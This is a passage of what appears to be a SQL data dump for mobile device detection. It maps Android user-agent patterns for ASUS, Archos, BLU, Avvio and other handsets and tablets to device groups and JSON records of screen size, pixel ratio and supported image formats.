Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00I) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00J) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00J-D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_T00Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_X002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_Z002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ASUS_Z007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ATHOS(QA4928)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; AX620) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; AX660) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; AX675) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; AZUMI A50c+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Air) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Alcatel A851L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Alto) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Andromax-c) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_smartfren','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Andy C5VP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Andy_5EI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Aquaris E10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_aquaris','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Aquaris E4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Aquaris E4.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Aquaris E5 FHD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Aquaris E5 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Aquaris E5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 101b Copper) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 101b Platinium) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 101c Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 101d Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_archos','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 50 Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 50b Neon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Archos 52 Platinum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Atom) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio 751) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio 768) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_489) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_776) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_779) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_790) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_790) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_792) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_793) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Avvio_795) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Azumi A35CLITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Azumi A35C_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Azumi A45T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Azumi A50c) AppleWebKit/* (KHTML,like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; B15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; B15Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BGH Joy Smart A5C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BGH Joy Smart A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BGH Joy Smart A7G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BGH Joy Smart AXS II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BIRDY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLOOM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU ADVANCE 4.0 L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU DASH L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU LIFE ONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU STUDIO 5.0 C HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU STUDIO 5.0 C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU STUDIO 5.0 II) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU STUDIO 5.0 xx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU STUDIO G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BLU STUDIO X8 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BNTV600) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nook','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":854,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BRAVIS BIZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; BRAVIS OMEGA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Beeline Smart 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Beeline Smart2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Bit) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Blade III) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Blade L2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Blade L2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Blade L3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Bmobile_AX535) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Boost IIse) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Boost IIse) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Boost) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Brio S430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 